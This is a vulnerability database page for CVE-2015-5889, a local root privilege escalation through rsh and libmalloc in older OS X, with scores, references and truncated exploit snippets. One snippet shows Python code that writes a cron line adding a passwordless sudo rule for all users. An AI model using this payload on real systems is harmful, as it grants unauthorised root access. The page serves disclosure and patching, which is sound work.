Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
7.2
CVSSv2

CVE-2015-5889

Published: 09/10/2015 Updated: 24/12/2016
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 730
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
Subscribe to Mac Os X

Vulnerability Summary

rsh in the remote_cmds component in Apple OS X prior to 10.11 allows local users to obtain root privileges via vectors involving environment variables.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

apple mac os x

Exploits

Exploit DB: issetugid() + rsh + libmalloc OS X Local Root
The default root-suid binary /usr/bin/rsh on Mac OS X uses execv() in an insecure manner /usr/bin/rsh will invoke /usr/bin/rlogin if launched with only a host argument, without dropping privileges or clearing the environment This exploit will pass "MallocLogFile" to /usr/bin/rsh, which is then passed on to rlogin and interpreted by libmalloc to c ...
Exploit DB: Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation
# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root # tested on osx 1095 / 10105 # jul/2015 # by rebel import os,time,sys env = {} s = osstat("/etc/sudoers")st_size env['MallocLogFile'] = '/etc/crontab' env['MallocStackLogging'] = 'yes' env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" &g ...
Exploit DB: Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation (Metasploit)
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::OSX::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {} ...

References

CWE-264https://support.apple.com/HT205267http://lists.apple.com/archives/security-announce/2015/Sep/msg00008.htmlhttp://www.securityfocus.com/bid/76908https://www.exploit-db.com/exploits/38540/http://www.rapid7.com/db/modules/exploit/osx/local/rsh_libmallochttp://seclists.org/fulldisclosure/2015/Oct/5http://www.securitytracker.com/id/1033703https://www.exploit-db.com/exploits/38371/http://packetstormsecurity.com/files/133826/issetugid-rsh-libmalloc-OS-X-Local-Root.htmlhttp://packetstormsecurity.com/files/134087/Mac-OS-X-10.9.5-10.10.5-rsh-libmalloc-Privilege-Escalation.htmlhttps://nvd.nist.govhttps://packetstormsecurity.com/files/133826/issetugid-rsh-libmalloc-OS-X-Local-Root.htmlhttps://www.exploit-db.com/exploits/38371/
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-4761command injectionCVE-2024-3676IDORCVE-2024-30039CVE-2024-32113CVE-2024-30049CVE-2024-4776SQL injection
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook